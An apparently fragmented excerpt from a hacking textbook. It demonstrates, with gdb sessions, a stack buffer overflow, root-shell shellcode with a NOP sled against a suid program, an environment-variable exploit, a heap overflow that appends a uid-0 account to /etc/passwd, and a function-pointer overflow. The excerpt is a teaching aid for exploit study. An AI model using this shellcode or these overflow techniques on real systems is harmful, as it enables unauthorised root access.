0x08048488 <main+20>:   jg     0x80484ab
0x0804848a <main+22>:   mov    eax,DWORD PTR [ebp+12]
0x0804848d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804848f <main+27>:   mov    DWORD PTR [esp+4],eax
0x08048493 <main+31>:   mov    DWORD PTR [esp],0x80485e5
0x0804849a <main+38>:   call   0x804831c
0x0804849f <main+43>:   mov    DWORD PTR [esp],0x0
0x080484a6 <main+50>:   call   0x804833c
0x080484ab <main+55>:   mov    eax,DWORD PTR [ebp+12]
0x080484ae <main+58>:   add    eax,0x4
0x080484b1 <main+61>:   mov    eax,DWORD PTR [eax]
0x080484b3 <main+63>:   mov    DWORD PTR [esp],eax
0x080484b6 <main+66>:   call   0x8048414
0x080484bb <main+71>:   test   eax,eax
0x080484bd <main+73>:   je     0x80484e5
0x080484bf <main+75>:   mov    DWORD PTR [esp],0x80485fb
0x080484c6 <main+82>:   call   0x804831c
0x080484cb <main+87>:   mov    DWORD PTR [esp],0x8048619
0x080484d2 <main+94>:   call   0x804831c
0x080484d7 <main+99>:   mov    DWORD PTR [esp],0x8048630
0x080484de <main+106>:  call   0x804831c
0x080484e3 <main+111>:  jmp    0x80484f1
0x080484e5 <main+113>:  mov    DWORD PTR [esp],0x804864d
0x080484ec <main+120>:  call   0x804831c
0x080484f1 <main+125>:  leave
0x080484f2 <main+126>:  ret
End of assembler dump
...
At this point, the EAX
register contains a pointer to the first command-line argument
...
This first assembly instruction writes EAX
to where ESP is pointing (the top of the stack)
...
The second instruction
is the actual call
...
The address pushed to the stack is the return
address for the stack frame
...

(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
0x08048414 <check_authentication+0>:    push   ebp
0x08048415 <check_authentication+1>:    mov    ebp,esp
0x08048417 <check_authentication+3>:    sub    esp,0x38

...

leave
ret

(gdb) p 0x38
$3 = 56
(gdb) p 0x38 + 4 + 4
$4 = 64
(gdb)

Execution will continue into the check_authentication() function as EIP is
changed, and the first few instructions (shown in bold above) finish saving
memory for the stack frame
...
The first two instructions are for the saved frame pointer, and the
third instruction subtracts 0x38 from ESP
...
The return address and the saved frame pointer
are already pushed to the stack and account for the additional 8 bytes of
the 64-byte stack frame
...
This brings the program execution back to
the next instruction in main() after the function call at 0x080484bb
...

(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      0x08049744      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4
0xbffff7d0:     0xb7ff47b0      0x08048510      0xbffff7e8      0x080484bb
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848

(gdb) cont
Continuing
...
c:16
16         return auth_flag;
(gdb) x/32xw $esp
0xbffff7a0:     0xbffff7c0      0x080485dc      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7d0:     0x41414141      0x41414141      0x41414141      0x08004141
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) cont
Continuing
...

0x08004141 in ?? ()
(gdb)

When some of the bytes of the saved return address are overwritten, the
program will still try to use that value to restore the execution pointer register (EIP)
...
But this value doesn’t need to be random
...
But where should we tell it to go?

0x330

Experimenting with BASH
Since so much of hacking is rooted in exploitation and experimentation, the
ability to quickly try different things is vital
...

Perl is an interpreted programming language with a print command that
happens to be particularly suited to generating long sequences of characters
...
This command prints the character A 20 times
...
In the following
example, this notation is used to print the character A, which has the hexadecimal value of 0x41
...

This can be useful when stringing multiple addresses together
...
"BCD"
...
"Z";'
AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ

An entire shell command can be executed like a function, returning its
output in place
...
Here are two examples:
reader@hacking:~/booksrc $ $(perl -e 'print "uname";')
Linux
reader@hacking:~/booksrc $ una$(perl -e 'print "m";')e
Linux
reader@hacking:~/booksrc $

In each case, the output of the command found between the parentheses
is substituted for the command, and the command uname is executed
...
You can use whichever
syntax feels more natural for you; however, the parentheses syntax is easier
to read for most people
...
You can use this technique to easily test
the overflow_example
...

reader@hacking:~/booksrc $
...
/overflow_example $(perl -e 'print "A"x20
...
Using this distance, the value
variable is overwritten with the exact value 0x44434241, since the characters A,
B, C, and D have the hex values of 0x41, 0x42, 0x43, and 0x44, respectively
...
This means if you wanted to control the value variable with something
exact, like 0xdeadbeef, you must write those bytes into memory in reverse order
...
/overflow_example $(perl -e 'print "A"x20
...
c program with an exact value
...

reader@hacking:~/booksrc $ gcc -g -o auth_overflow2 auth_overflow2
...
/auth_overflow2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

mov    eax,DWORD PTR [eax]
mov    DWORD PTR [esp+4],eax
mov    DWORD PTR [esp],0x80485e5
call   0x804831c
mov    DWORD PTR [esp],0x0
call   0x804833c
mov    eax,DWORD PTR [ebp+12]
add    eax,0x4
mov    eax,DWORD PTR [eax]
mov    DWORD PTR [esp],eax
call   0x8048414
test   eax,eax
je     0x80484e5
mov    DWORD PTR [esp],0x80485fb
call   0x804831c
mov    DWORD PTR [esp],0x8048619
call   0x804831c
mov    DWORD PTR [esp],0x8048630
call   0x804831c
jmp    0x80484f1
mov    DWORD PTR [esp],0x804864d
call   0x804831c
leave
ret
(gdb)

This section of code shown in bold contains the instructions that display
the Access Granted message
...
The exact distance between the return address and
the start of the password_buffer can change due to different compiler versions
and different optimization flags
...
This way, at least one of the instances
will overwrite the return address, even if it has shifted around due to compiler
optimizations
...
/auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted
...
When
the check_authentication() function returns, execution jumps directly to the
new target address instead of returning to the next instruction after the call
...


The notesearch program is vulnerable to a buffer overflow on the line
marked in bold here
...

The notesearch exploit uses a similar technique to overflow a buffer into
the return address; however, it also injects its own instructions into memory
and then returns execution there
...
This is
especially devastating for the notesearch program, since it is suid root
...

But when new instructions can be injected in and execution can be
controlled with a buffer overflow, the program logic is meaningless
...
This is the dangerous combination that allows the notesearch exploit to gain a root shell
...

reader@hacking:~/booksrc $ gcc -g exploit_notesearch
...
/a
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...

15
16
strcpy(command, "
...

17         buffer = command + strlen(command); // Set buffer at the end
...

20         offset = atoi(argv[1]);
(gdb)
21
22         ret = (unsigned int) &i - offset; // Set return address
...

25         *((unsigned int *)(buffer+i)) = ret;
26         memset(buffer, 0x90, 60); // Build NOP sled
...
c, line 26
...
c, line 27
...
c, line 28
...
The first part is a for loop that fills the buffer with a 4-byte
address stored in the ret variable
...
This
value is added to the buffer address, and the whole thing is typecast as an
unsigned integer pointer
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:26
26         memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/40x buffer
0x804a016:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a026:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a036:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a046:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a056:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a066:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command
0x804a008:       "
...
You can also see the relationship between the command pointer and
the buffer pointer
...


(gdb) cont
Continuing
...
c:27
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0xbffff6f6
0x804a056:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a066:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command
0x804a008:       "
...

(gdb) cont
Continuing
...
c:29
29         strcat(command, "\'");
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0x3158466a
0x804a056:      0xcdc931db      0x2f685180      0x6868732f      0x6e69622f
0x804a066:      0x5351e389      0xb099e189      0xbf80cd0b      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command
0x804a008:       "
...
The difficulty of finding the exact location of the
return address is eased by using the repeated return address technique
...

This means the actual address must be known ahead of time, before it even
goes into memory
...
Fortunately, there is another hacking technique,
called the NOP sled, that can assist with this difficult chicanery
...
It is a single-byte instruction
that does absolutely nothing
...
In this case, NOP
instructions are going to be used for a different purpose: as a fudge factor
...
This means that as long as the
return address is overwritten with any address found in the NOP sled, the EIP
register will slide down the sled to the shellcode, which will execute properly
...
This means our completed exploit buffer looks something like this:
NOP sled | Shellcode | Repeated return address

Even with a NOP sled, the approximate location of the buffer in memory
must be predicted in advance
...
By subtracting an offset from this location, the relative address of any variable can be
obtained
...
c
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

In the notesearch exploit, the address of the variable i in main()’s stack
frame is used as a point of reference
...
This offset was previously determined to be 270, but how is this number calculated?
The easiest way to determine this offset is experimentally
...


Since the notesearch exploit allows an optional command-line argument
to define the offset, different offsets can quickly be tested
...
c
reader@hacking:~/booksrc $
...
out 100
-------[ end of note data ]-------
reader@hacking:~/booksrc $
...
out 200
-------[ end of note data ]-------
reader@hacking:~/booksrc $

However, doing this manually is tedious and stupid
...
The seq command is a simple
program that generates sequences of numbers, which is typically used with
looping
...
When three arguments are used, the middle
argument dictates how much to increment each time
...

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)
> do
> echo The value is $i
> done
The value is 1
The value is 4
The value is 7
The value is 10
reader@hacking:~/booksrc $


The function of the for loop should be familiar, even if the syntax is a
little different
...
Then everything between the do and
done keywords is executed
...
Since the NOP sled is 60 bytes long, and we can return anywhere on
the sled, there are about 60 bytes of wiggle room
...

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
>
...
out $i
> done
Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

When the right offset is used, the return address is overwritten with a
value that points somewhere on the NOP sled
...
This is how the default offset value was discovered
...
Fortunately, there
are other locations in memory where shellcode can be stashed
...
The example below sets an environment variable called
MYVAR to the string test
...
In addition, the env command will show all the
environment variables
...

reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/
...
2-gnome2
WINDOWID=39845969
OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=4
0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*
...
tgz=01;31:*
...
taz=01;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:*
...
rpm=01;31:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:*
...
ppm=01;35:*
...
xbm=01;35:*
...
tif=01;35:*
...
png=01;35:*
...
mpg=01;35:*
...
avi=01;35:*
...
gl=01;35:*
...
xcf=01;35:*
...
flac=01;35:*
...
mpc=01;35:*
...
wav=01;35:
SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent
...
ICE-unix/7489
USERNAME=reader
DESKTOP_SESSION=default
...
UTF-8
GDMSESSION=default
...
0
MYVAR=test
LESSCLOSE=/usr/bin/lesspipe %s %s
RUNNING_UNDER_GDM=yes
COLORTERM=gnome-terminal
XAUTHORITY=/home/reader/
...
The shellcode from
the notesearch exploit can be used; we just need to put it into a file in binary
form
...

reader@hacking:~/booksrc $ head exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
reader@hacking:~/booksrc $ head exploit_notesearch
...
c | grep "^\"" | cut -d\" -f2
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $

The first 10 lines of the program are piped into grep, which only shows the
lines that begin with a quotation mark
...

BASH’s for loop can actually be used to send each of these lines to an
echo command, with command-line options to recognize hex expansion and
to suppress adding a newline character to the end
...
bin
reader@hacking:~/booksrc $ for i in $(head exploit_notesearch
...
bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023
reader@hacking:~/booksrc $

Now we have the shellcode in a file called shellcode
...
This can be used
with command substitution to put shellcode into an environment variable,
along with a generous NOP sled
...
bin)
reader@hacking:~/booksrc $ echo $SHELLCODE

1 1 1

j
XQh//shh/bin

Q

S

reader@hacking:~/booksrc $

And just like that, the shellcode is now on the stack in an environment
variable, along with a 200-byte NOP sled
...
The environment variables are located near the bottom of the
stack, so this is where we should look when running notesearch in a debugger
...
/notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

This will set up memory for the program, but it will stop before anything
happens
...

(gdb) i r esp
esp            0xbffff660       0xbffff660
(gdb) x/24s $esp + 0x240
0xbffff8a0:      ""
0xbffff8a1:      ""
0xbffff8a2:      ""
0xbffff8a3:      ""
0xbffff8a4:      ""
0xbffff8a5:      ""
0xbffff8a6:      ""
0xbffff8a7:      ""
0xbffff8a8:      ""
0xbffff8a9:      ""
0xbffff8aa:      ""
0xbffff8ab:      "i686"
0xbffff8b0:      "/home/reader/booksrc/notesearch"
0xbffff8d0:      "SSH_AGENT_PID=7531"
0xbffffd56:      "SHELLCODE=", '\220'
...
gtkrc-1
...
tar=01;31:*
...
arj=01
;31:*
...

0xbffffb29:
"1;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:*
...
rpm=01;3
1:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:*
...
ppm=01
;35:*
...

(gdb) x/s 0xbffff8e3
0xbffff8e3:      "SHELLCODE=", '\220'
...

(When the program is run outside of the debugger, these addresses might
be a little different
...
But with a 200-byte NOP sled, these
inconsistencies aren’t a problem if an address near the middle of the sled is
picked
...
After
determining the address of the injected shellcode instructions, the exploitation is simply a matter of overwriting the return address with this address
...
/notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
2#

The target address is repeated enough times to overflow the return address,
and execution returns into the NOP sled in the environment variable, which
inevitably leads to the shellcode
...
This usually makes exploitations quite a bit easier
...
In C’s standard
library there is a function called getenv(), which accepts the name of an environment variable as its only argument and returns that variable’s memory address
...
c demonstrates the use of getenv()
...
c
#include ...
h>
int main(int argc, char *argv[]) {
printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

When compiled and run, this program will display the location of a given
environment variable in its memory
...

reader@hacking:~/booksrc $ gcc getenv_example
...
/a
...
/notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
This means the environment prediction is still off
...
bin)
reader@hacking:~/booksrc $
...
out SLEDLESS
SLEDLESS is at 0xbfffff46

reader@hacking:~/booksrc $
...
The length of the name of the program
being executed seems to have an effect on the address of the environment
variables
...
This type of experimentation and pattern
recognition is an important skill for a hacker to have
...
out a
reader@hacking:~/booksrc $
...
out bb
reader@hacking:~/booksrc $
...
out ccc
reader@hacking:~/booksrc $
...
/a
...

The general trend seems to be a decrease of two bytes in the address of the
environment variable for every single-byte increase in the length of the program name
...
out, since the difference in length between the names a
...
This must mean
the name of the executing program is also located on the stack somewhere,
which is causing the shifting
...
This means
the crutch of a NOP sled can be eliminated
...
c program
adjusts the address based on the difference in program name length to provide
a very accurate prediction
...
c
#include ...
h>
#include ...
*/
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name
...
This
can be used to exploit stack-based buffer overflows without the need for a
NOP sled
...
c
reader@hacking:~/booksrc $
...
/notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $
...
The
use of environment variables simplifies things considerably when exploiting
from the command line, but these variables can also be used to make exploit
code more reliable
...
c program to
execute a command
...
The -c tells the sh program to execute commands
from the command-line argument passed to it
...

Go to http://www
...
com/codesearch?q=package:libc+system to see
this code in its entirety
...
2
...
The fork() function
starts a new process, and the execl() function is used to run the command
through /bin/sh with the appropriate command-line arguments
...
If a setuid program
uses system(), the privileges won’t be transferred, because /bin/sh has been
dropping privileges since version two
...
We can
ignore the fork() and just focus on the execl() function to run the command
...
The arguments for
execl() start with the path to the target program and are followed by each of
the command-line arguments
...
The last
argument is a NULL to terminate the argument list, similar to how a null
byte terminates a string
...
This environment is presented in the form of an array of
pointers to null-terminated strings for each environment variable, and the
environment array itself is terminated with a NULL pointer
...
If the environment array is just the
shellcode as the first string (with a NULL pointer to terminate the list), the
only environment variable will be the shellcode
...
In Linux, the address will be 0xbffffffa, minus the length of the
shellcode in the environment, minus the length of the name of the executed
program
...
All
that’s needed in the exploit buffer is the address, repeated enough times to
overflow the return address in the stack, as shown in exploit_notesearch_env
...

exploit_notesearch_env
...
h>
...
h>
...
/notesearch");
for(i=0; i < 160; i+=4)
*((unsigned int *)(buffer+i)) = ret;
execle("
...
Also, it doesn’t start any additional processes
...
c
reader@hacking:~/booksrc $
...
out
-------[ end of note data ]-------
sh-3
...

As in auth_overflow
...
This
is true regardless of the memory segment these variables reside in; however,
the control tends to be quite limited
...
While these types of overflows aren’t as standardized as
stack-based overflows, they can be just as effective
...
Two buffers are allocated on the heap, and the first
command-line argument is copied into the first buffer
...

Excerpt from notetaker
...

strcpy(buffer, argv[1]);

// Copy into buffer
...
The distance between these two addresses is 104 bytes
...
/notetaker test
[DEBUG] buffer
@ 0x804a008: 'test'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...

reader@hacking:~/booksrc $
...
This causes the datafile to
be nothing but a single null byte, which obviously cannot be opened as a file
...
/notetaker $(perl -e 'print "A"x104
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
This causes the program to write to testfile instead of
/var/notes, as it was originally programmed to do
...
Similar to the return address
overwrite with stack overflows, there are control points within the heap
architecture itself
...
Since version 2
...
5, these functions have been rewritten
to print debugging information and terminate the program when they
detect problems with the heap header information
...
However, this particular exploit doesn’t
use heap header information to do its magic, so by the time free() is called,
the program has already been tricked into writing to a new file with root
privileges
...
c
if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
/testfile
-rw------- 1 root reader 118 2007-09-09 16:19
...
/testfile
cat:
...
/testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAtestfile
reader@hacking:~/booksrc $

A string is read until a null byte is encountered, so the entire string is
written to the file as the userinput
...
This also means that since the filename can
be controlled, data can be appended to any file
...

There are probably several clever ways to exploit this type of capability
...
This file contains all of the usernames, IDs, and login shells for all the
users of the system
...

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd
...
The password fields are all filled with
the x character, since the encrypted passwords are stored elsewhere in a
shadow file
...
)
In addition, any entry in the password file that has a user ID of 0 will be given
root privileges
...

The password can be encrypted using a one-way hashing algorithm
...
To prevent lookup attacks, the algorithm uses a salt
value, which when varied creates a different hash value for the same input
password
...
The first argument is the password, and the second is the salt
value
...

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA")
...
"\n"'
XXq2wKiyI43A2
reader@hacking:~/booksrc $

Notice that the salt value is always at the beginning of the hash
...
Using the salt value from the stored encrypted password, the
system uses the same one-way hashing algorithm to encrypt whatever text
the user typed as the password
...
This
allows the password to be used for authentication without requiring that the
password be stored anywhere on the system
...
The line to
append to /etc/passwd should look something like this:
myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

However, the nature of this particular heap overflow exploit won’t allow
that exact line to be written to /etc/passwd, because the string must end with
/etc/passwd
...
This can be compensated
for with the clever use of a symbolic file link, so the entry can both end with
/etc/passwd and still be a valid line in the password file
...
This means
that a valid login shell for the password file is also /tmp/etc/passwd, making
the following a valid password file line:
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

The values of this line just need to be slightly modified so that the portion
before /etc/passwd is exactly 104 bytes long:
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc -c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...
":/root:/tmp"' | wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...
":/root:/tmp"' | wc -c
104
reader@hacking:~/booksrc $

If /etc/passwd is added to the end of that final string (shown in bold), the
string above will be appended to the end of the /etc/passwd file
...

reader@hacking:~/booksrc $
...
"A"x68
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
c program enough, you will realize
that, similar to at a casino, most of the games are statistically weighted in
favor of the house
...
Perhaps there’s a way to even the odds a bit
...
This pointer is stored
in the user structure, which is declared as a global variable
...

From game_of_chance
...

// Global variables
struct user player;

// Player struct

The name buffer in the user structure is a likely place for an overflow
...

void input_name() {
char *name_ptr, input_char='\n';
while(input_char == '\n')
// Flush any leftover
scanf("%c", &input_char); // newline chars
...
name); // name_ptr = player name's address
while(input_char != '\n') { // Loop until newline
...

scanf("%c", &input_char); // Get the next char
...

}
*name_ptr = 0; // Terminate the string
...
There is nothing
to limit it to the length of the destination name buffer, meaning an overflow
is possible
...
This happens in the
play_the_game() function, which is called when any game is selected from the
menu
...

if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set,
if(choice == 1)
// then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game();
// Play the game
...
This means that in order to
get the program to call the function pointer without overwriting it, a game
must be played first to set the last_game variable
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] -> 1
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: 5
The winning number is 17
Sorry, you didn't win
...
/game_of_chance

You can temporarily suspend the current process by pressing CTRL-Z
...

Back at the shell, we figure out an appropriate overflow buffer, which can
be copied and pasted in as a name later
...
As the output below shows, the
name buffer is 100 bytes from the current_game pointer within the user
structure
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
c, line 41
...
out
Breakpoint 1, main () at game_of_chance
...

(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' ,
current_game = 0}
(gdb) x/x &player
...
current_game
0x804b6d0 : 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running
...
This can be copied and pasted into the interactive Game of
Chance program when it is resumed
...

reader@hacking:~/booksrc $ perl -e 'print "A"x100
...
"\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg

...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] -> 1
[DEBUG] current_game pointer @ 0x42424242
Segmentation fault
reader@hacking:~/booksrc $

Select menu option 5 to change the username, and paste in the overflow
buffer
...
When menu
option 1 is selected again, the program will crash when it tries to call the
function pointer
...

The nm command lists symbols in object files
...

reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux
08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
w __gmon_start__
08049669 T __i686
...
bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
U __libc_start_main@@GLIBC_2
...
0
0804b640 b completed
...
0
08048684 T fatal
080492bf T find_the_ace
08048650 t frame_dummy
080489cc T get_player_data
U getuid@@GLIBC_2
...
0
U open@@GLIBC_2
...
0
U perror@@GLIBC_2
...
0
U rand@@GLIBC_2
...
0
08048aaf T register_new_player
U scanf@@GLIBC_2
...
0
U strcpy@@GLIBC_2
...
0
08048e91 T take_wager
U time@@GLIBC_2
...
0
reader@hacking:~/booksrc $

The jackpot() function is a wonderful target for this exploit
...
Instead, the jackpot() function will just be called
directly, doling out the reward of 100 credits and tipping the scales in the
player’s direction
...
The menu selections
can be scripted in a single buffer that is piped to the program’s standard
input
...
The following
example will choose menu item 1, try to guess the number 7, select n when
asked to play again, and finally select menu item 7 to quit
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win
...

reader@hacking:~/booksrc $

This same technique can be used to script everything needed for the
exploit
...
This will overflow the current_game function pointer, so when
the Pick a Number game is played again, the jackpot() function is called
directly
...
"A"x100
...
"1\nn\n"
...
"A"x100
...
"1\nn\n"
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
